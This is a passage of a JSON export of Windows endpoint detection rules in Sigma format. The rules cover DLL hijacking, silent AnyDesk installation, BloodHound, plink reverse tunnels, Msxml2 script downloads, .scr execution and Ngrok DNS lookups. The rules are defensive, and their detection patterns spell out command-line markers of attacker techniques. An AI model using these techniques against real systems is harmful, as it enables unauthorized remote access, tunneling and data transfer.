"rule_level_override": null,
"rule_id": "b1782bf1-6bfb-4197-a276-32e83634bc02",
"rule_name": "DLL Hijacking via MsiFiler.exe",
"rule_description": "Detects potential Windows DLL Hijacking via the Microsoft developer tool MsiFiler.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-11-04",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b1800ae4-33f9-442e-b207-30f8f0d1f199",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622704Z",
"creation_date": "2026-03-23T11:45:34.622706Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622710Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2022/03/07/2021-year-in-review/",
"https://twitter.com/TheDFIRReport/status/1498672358843953152",
"https://support.anydesk.com/knowledge/command-line-interface-for-windows",
"https://attack.mitre.org/techniques/T1219/002/"
],
"name": "t1219_002_suspicious_anydesk.yml",
"content": "title: Suspicious AnyDesk Execution\nid: b1800ae4-33f9-442e-b207-30f8f0d1f199\ndescription: |\n Detects a suspicious execution of AnyDesk.\n AnyDesk is a remote desktop software that allows users to access and control computers remotely.\n This tool is frequently used by ransomware groups to gain remote access on system.\n It is recommended to verify if the usage of this tool is legitimate and to look for potential malicious actions.\nreferences:\n - https://thedfirreport.com/2022/03/07/2021-year-in-review/\n - https://twitter.com/TheDFIRReport/status/1498672358843953152\n - https://support.anydesk.com/knowledge/command-line-interface-for-windows\n - https://attack.mitre.org/techniques/T1219/002/\ndate: 2022/03/11\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1219.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.RMM.AnyDesk\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\AnyDesk.exe'\n - Product: 'AnyDesk'\n - Description: 'AnyDesk'\n - Company: 'AnyDesk Software GmbH'\n\n selection_cmd1:\n CommandLine|contains|all:\n - '--install'\n - '--start-with-win'\n - '--silent'\n\n selection_cmd2:\n CommandLine|contains:\n - '--set-password'\n - '--get-id'\n\n filter_options1:\n CommandLine|contains: ' --create-shortcuts'\n filter_options2:\n CommandLine|contains:\n - ' --update-manually'\n - ' --update-auto'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_atera:\n CommandLine: 'AnyDesk-????????_msi.exe --set-password'\n GrandparentImage:\n - '?:\\Program Files\\ATERA Networks\\AteraAgent\\Packages\\AgentPackageADRemote\\AgentPackageADRemote.exe'\n - '?:\\Program Files (x86)\\ATERA 
Networks\\AteraAgent\\Packages\\AgentPackageADRemote\\AgentPackageADRemote.exe'\n - '?:\\Program Files\\ATERA Networks\\AteraAgent\\Agent\\packages\\AgentPackageADRemote\\AgentPackageADRemote.exe'\n\n exclusion_insaneremote:\n CommandLine: '.\\InsaneRemote.exe --install ?:\\Program Files\\InsaneRMMAnydesk --remove-first --start-with-win --silent'\n ParentCommandLine: '?:\\Program Files\\InsaneRMM\\InsaneRMM.exe install'\n\n exclusion_wapt:\n ProcessAncestors|contains: '|?:\\Program Files (x86)\\wapt\\wapt-get.exe|?:\\Program Files (x86)\\wapt\\waptservice.exe|'\n\n condition: selection and 1 of selection_cmd* and not all of filter_options* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b1800ae4-33f9-442e-b207-30f8f0d1f199",
"rule_name": "Suspicious AnyDesk Execution",
"rule_description": "Detects a suspicious execution of AnyDesk.\nAnyDesk is remote desktop software that allows users to access and control computers remotely.\nThis tool is frequently used by ransomware groups to gain remote access to systems.\nIt is recommended to verify whether the usage of this tool is legitimate and to look for potential malicious actions.\n",
"rule_creation_date": "2022-03-11",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1219.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b1a129c6-4b0d-427c-836e-56db8d8b4f7e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605323Z",
"creation_date": "2026-03-23T11:45:34.605327Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605334Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/BloodHoundAD/BloodHound",
"https://attack.mitre.org/techniques/T1018/",
"https://attack.mitre.org/software/S0521/"
],
"name": "t1018_bloodhound_execution.yml",
"content": "title: BloodHound Execution\nid: b1a129c6-4b0d-427c-836e-56db8d8b4f7e\ndescription: |\n Detects BloodHound, an Active Directory (AD) reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment.\n Attackers can use BloodHound to find vulnerabilities in the configuration of an Active Directory environment allowing them to perform privilege escalation.\n It is recommended to analyze the execution context of this process to establish whether this execution is legitimate for audit reasons or the consequence of an ongoing attack.\nreferences:\n - https://github.com/BloodHoundAD/BloodHound\n - https://attack.mitre.org/techniques/T1018/\n - https://attack.mitre.org/software/S0521/\ndate: 2023/11/30\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.001\n - attack.t1087.002\n - attack.t1482\n - attack.t1069.001\n - attack.t1069.002\n - attack.t1018\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.BloodHound\n - classification.Windows.Behavior.Discovery\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n - OriginalFileName: 'BloodHound.exe'\n - Product: 'BloodHound'\n - Image|endswith: '\\BloodHound.exe'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b1a129c6-4b0d-427c-836e-56db8d8b4f7e",
"rule_name": "BloodHound Execution",
"rule_description": "Detects BloodHound, an Active Directory (AD) reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment.\nAttackers can use BloodHound to find vulnerabilities in the configuration of an Active Directory environment allowing them to perform privilege escalation.\nIt is recommended to analyze the execution context of this process to establish whether this execution is legitimate for audit reasons or the consequence of an ongoing attack.\n",
"rule_creation_date": "2023-11-30",
"rule_modified_date": "2025-01-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018",
"attack.t1069.001",
"attack.t1069.002",
"attack.t1087.001",
"attack.t1087.002",
"attack.t1482"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b1b34eb2-c730-495c-aef2-d59f6f12ed53",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624516Z",
"creation_date": "2026-03-23T11:45:34.624518Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624523Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/",
"https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/",
"https://attack.mitre.org/techniques/T1572/",
"https://attack.mitre.org/techniques/T1021/001/"
],
"name": "t1021_001_suspicious_process_plink.yml",
"content": "title: Suspicious plink.exe Execution\nid: b1b34eb2-c730-495c-aef2-d59f6f12ed53\ndescription: |\n Detects the suspicious execution of plink.exe to create a tunnel via the forward of a remote port to local address.\n Attackers use this technique for lateral movement or bypass network restrictions.\n It is recommended to analyze the parent process for suspicious activities and to determine if the executed binary is legitimate.\nreferences:\n - https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/\n - https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\n - https://attack.mitre.org/techniques/T1572/\n - https://attack.mitre.org/techniques/T1021/001/\ndate: 2022/04/14\nmodified: 2025/12/05\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1572\n - attack.lateral_movement\n - attack.t1021.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.Plink\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\plink.exe'\n - OriginalFileName: 'Plink'\n selection_commandline:\n CommandLine|contains: ' -R '\n\n exclusion_ansys:\n ParentImage|endswith:\n - '\\AnsysWBU.exe'\n - '\\AnsysFWW.exe'\n CommandLine|contains|all:\n - 'plink.exe -batch -i'\n - ' qsub -'\n - ' -s /bin/sh -v -r y -n '\n\n exclusion_command:\n CommandLine|contains:\n - ' chown -R '\n - 'shutdown -r now'\n - ' rm -r '\n - ' grep -R '\n\n exclusion_tihelp:\n ProcessParentOriginalFileName: 'tishelp.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'TRANQUIL I.T. SYSTEMS'\n\n exclusion_monnaie_services:\n ProcessCommandLine|contains|all:\n - ':127.0.0.1:80'\n - '.monnaie-services.com > ?:\\EMSCine\\Prog\\pid\\tunnels\\rssh*.out 2>&1'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b1b34eb2-c730-495c-aef2-d59f6f12ed53",
"rule_name": "Suspicious plink.exe Execution",
"rule_description": "Detects the suspicious execution of plink.exe to create a tunnel by forwarding a remote port to a local address.\nAttackers use this technique for lateral movement or to bypass network restrictions.\nIt is recommended to analyze the parent process for suspicious activities and to determine whether the executed binary is legitimate.\n",
"rule_creation_date": "2022-04-14",
"rule_modified_date": "2025-12-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.001",
"attack.t1572"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b1e3ba61-78ff-46ac-b389-cf26f24dc4d1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098564Z",
"creation_date": "2026-03-23T11:45:34.098566Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098570Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_systempropertiesprotection.yml",
"content": "title: DLL Hijacking via systempropertiesprotection.exe\nid: b1e3ba61-78ff-46ac-b389-cf26f24dc4d1\ndescription: |\n Detects potential Windows DLL Hijacking via systempropertiesprotection.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'systempropertiesprotection.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b1e3ba61-78ff-46ac-b389-cf26f24dc4d1",
"rule_name": "DLL Hijacking via systempropertiesprotection.exe",
"rule_description": "Detects potential Windows DLL Hijacking via systempropertiesprotection.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b2015219-0f93-4180-a062-fd0c7e57fa28",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090262Z",
"creation_date": "2026-03-23T11:45:34.090264Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090269Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://csbygb.gitbook.io/pentips/post-exploitation/file-transfers",
"https://attack.mitre.org/techniques/T1048/003/",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1105_msxml2_http_filetransfer_wmi.yml",
"content": "title: File Transfered via Msxml2 COM Object\nid: b2015219-0f93-4180-a062-fd0c7e57fa28\ndescription: |\n Detects scripts using the Msxml2.XMLHTTP COM Object to download files.\n Attackers may use this COM object to transfer files or tools to the local machine or to exfiltrate data via legitimate-looking commands and network traffic.\n It is recommended to check the Outlook home page registry configuration for suspicious content, such as commands executed by the Outlook process, with the help of the VBScript telemetry. It is also recommended to investigate the downloaded files and any programs executed in the context of this alert.\nreferences:\n - https://csbygb.gitbook.io/pentips/post-exploitation/file-transfers\n - https://attack.mitre.org/techniques/T1048/003/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2025/10/06\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.command_and_control\n - attack.t1105\n - attack.exfiltration\n - attack.t1048.003\n - classification.Windows.Source.AmsiScan\n - classification.Windows.Script.VBScript\n - classification.Windows.Script.Jscript\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: amsi_scan\ndetection:\n selection_vbscript:\n AppName:\n - 'VBScript'\n - 'OFFICE_VBA'\n TextPayload|contains|all:\n - 'CreateObject(\"MSXML2.ServerXMLHTTP\")'\n - '.Open '\n - '.Send '\n\n selection_jscript:\n AppName: 'JScript'\n TextPayload|contains|all:\n - 'ActiveXObject(\"MSXML2.XMLHTTP\")'\n - '.open('\n - '.send('\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b2015219-0f93-4180-a062-fd0c7e57fa28",
"rule_name": "File Transfered via Msxml2 COM Object",
"rule_description": "Detects scripts using the Msxml2.XMLHTTP COM Object to download files.\nAttackers may use this COM object to transfer files or tools to the local machine or to exfiltrate data via legitimate-looking commands and network traffic.\nIt is recommended to check the Outlook home page registry configuration for suspicious content, such as commands executed by the Outlook process, with the help of the VBScript telemetry. It is also recommended to investigate the downloaded files and any programs executed in the context of this alert.\n",
"rule_creation_date": "2025-10-06",
"rule_modified_date": "2025-10-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.execution",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1048.003",
"attack.t1059.001",
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b20eab34-dd0f-427c-8b8a-b77db11d2ff2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086104Z",
"creation_date": "2026-03-23T11:45:34.086106Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086110Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securelist.com/the-epic-turla-operation/65545/",
"https://attack.mitre.org/techniques/T1204/002/"
],
"name": "t1204_002_suspicious_execution_scr_file.yml",
"content": "title: Suspicious .scr File Execution\nid: b20eab34-dd0f-427c-8b8a-b77db11d2ff2\ndescription: |\n Detects the execution of a suspicious .scr file, a Portable Executable (PE) file related to the Windows screensaver application.\n Usually, this type of file is located in 'C:\\\\Windows\\\\System32\\\\' or 'C:\\\\Windows\\\\SysWOW64\\\\' and this program is executed after a configurable time of user inactivity.\n Attackers can use this file to gain execution during a phishing campaign by masquerading a malicious file to increase the likelihood that a user will open and successfully execute it.\n It is recommended to check the .scr file origin and the legitimacy of its presence on the system.\nreferences:\n - https://securelist.com/the-epic-turla-operation/65545/\n - https://attack.mitre.org/techniques/T1204/002/\ndate: 2022/02/15\nmodified: 2026/01/16\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.persistence\n - attack.t1546.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ProcessProcessName|endswith: '.scr'\n\n filter_directory:\n CurrentDirectory:\n - '?:\\Windows\\System32'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Program Files\\\\*'\n - '?:\\Program Files (x86)\\\\*'\n - '?:\\Windows\\ImmersiveControlPanel\\'\n\n filter_winlogon:\n ParentImage:\n - '?:\\Windows\\System32\\winlogon.exe'\n - '?:\\Windows\\SysWOW64\\winlogon.exe'\n\n filter_microsoft:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n exclusion_rundll32:\n CommandLine|startswith: 'rundll32.exe desk.cpl,InstallScreenSaver '\n\n exclusion_boinc1:\n Image: '?:\\Windows\\boinc.scr'\n Signed: 'true'\n Signature: 'University of California, Berkeley'\n exclusion_boinc2:\n ParentImage:\n - '?:\\Program Files\\BOINC\\boincmgr.exe'\n - '?:\\Program Files (x86)\\BOINC\\boincmgr.exe'\n\n exclusion_kiosk:\n Image: '?:\\Windows\\SysWOW64\\SKPlayer.scr'\n ParentCommandLine|startswith: '?:\\Program Files (x86)\\SiteKiosk\\SiteKiosk.exe'\n\n exclusion_flywin:\n # Fenetres Volantes.scr\n ProcessSha256: '129f41492be8351350bbd65569908d288b82760626c02696a3c8e5cc5231b805'\n\n exclusion_earth:\n Description: 'Earth Screen Saver for Windows'\n OriginalFileName: 'EARTH.SCR'\n\n exclusion_google:\n Description: 'Google Photos Screensaver'\n OriginalFileName: 'GPhotos.SCR'\n\n exclusion_webshot:\n Description: 'Webshots Photo Manager'\n OriginalFileName: 'Webshots2.SCR'\n\n exclusion_bubbles:\n Description: 'Bubbles Screen Saver'\n OriginalFileName: 'Bubbles'\n\n exclusion_irfanview:\n Description: 'Slideshow PlugIn for IrfanView'\n OriginalFileName: 'Slideshow.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b20eab34-dd0f-427c-8b8a-b77db11d2ff2",
"rule_name": "Suspicious .scr File Execution",
"rule_description": "Detects the execution of a suspicious .scr file, a Portable Executable (PE) file related to the Windows screensaver application.\nUsually, this type of file is located in 'C:\\\\Windows\\\\System32\\\\' or 'C:\\\\Windows\\\\SysWOW64\\\\' and this program is executed after a configurable time of user inactivity.\nAttackers can use this file to gain execution during a phishing campaign by masquerading a malicious file to increase the likelihood that a user will open and successfully execute it.\nIt is recommended to check the .scr file origin and the legitimacy of its presence on the system.\n",
"rule_creation_date": "2022-02-15",
"rule_modified_date": "2026-01-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1204.002",
"attack.t1546.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b3222cdc-4054-4f68-9306-a77d513f35a9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296499Z",
"creation_date": "2026-03-23T11:45:35.296501Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296505Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/hakluke/status/1679023050526687244",
"https://twitter.com/malmoeb/status/1519710302820089857",
"https://www.huntress.com/blog/abusing-ngrok-hackers-at-the-end-of-the-tunnel",
"https://attack.mitre.org/techniques/T1572/",
"https://attack.mitre.org/techniques/T1090/",
"https://attack.mitre.org/techniques/T1567/",
"https://attack.mitre.org/software/S0508/"
],
"name": "t1090_ngrok_tunnel_dns_request.yml",
"content": "title: Ngrok Tunnel via an Uncommon Binary\nid: b3222cdc-4054-4f68-9306-a77d513f35a9\ndescription: |\n This rule detects DNS requests to the official Ngrok tunnels domain via an uncommon binary.\n Ngrok is a tool that allows users to expose their local servers to the internet, which enables attackers to tunnel malicious traffic through an otherwise secure network.\n It isn't necessary to download the Ngrok binary to use an Ngrok tunnel; this can be done by creating a reverse SSH tunnel to the Ngrok servers.\n If you believe this to be an indicator of malicious activity, you should take investigative actions.\n It is recommended to identify the binary making the connection, the protocol used by the tunnel, the concerned users and what resources the attacker could have accessed through the tunnel.\nreferences:\n - https://twitter.com/hakluke/status/1679023050526687244\n - https://twitter.com/malmoeb/status/1519710302820089857\n - https://www.huntress.com/blog/abusing-ngrok-hackers-at-the-end-of-the-tunnel\n - https://attack.mitre.org/techniques/T1572/\n - https://attack.mitre.org/techniques/T1090/\n - https://attack.mitre.org/techniques/T1567/\n - https://attack.mitre.org/software/S0508/\ndate: 2023/07/13\nmodified: 2026/02/19\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1090\n - attack.t1572\n - attack.exfiltration\n - attack.t1567\n - attack.s0508\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Tool.Ngrok\n - classification.Windows.Behavior.Tunneling\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection:\n QueryName|contains:\n - 'tunnel.??.ngrok.com'\n - 'tunnel.ngrok.com'\n - '.ngrok-agent.com'\n\n filter_ngrok:\n - ProcessOriginalFileName: 'ngrok.exe'\n - ProcessProduct: 'ngrok agent'\n\n exclusion_misc_windows:\n ProcessImage:\n - '?:\\Windows\\System32\\PING.EXE'\n - '?:\\Windows\\SysWOW64\\PING.EXE'\n - '?:\\Windows\\System32\\ipconfig.exe'\n - '?:\\Windows\\SysWOW64\\ipconfig.exe'\n - '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n - '?:\\Windows\\System32\\wbem\\WmiApSrv.exe'\n - '?:\\Windows\\System32\\smartscreen.exe'\n\n exclusion_svchost:\n ProcessImage: '?:\\Windows\\System32\\svchost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_digicam:\n # SHA256: 61af1afdef0d715eb78b651ce4ae5789c234ba72d0e38e7a89b7577bda15d453\n ProcessImage: '?:\\Program Files (x86)\\digiCamControl\\ngrok.exe'\n ProcessOriginalFileName: ''\n\n exclusion_npm:\n # SHA256: 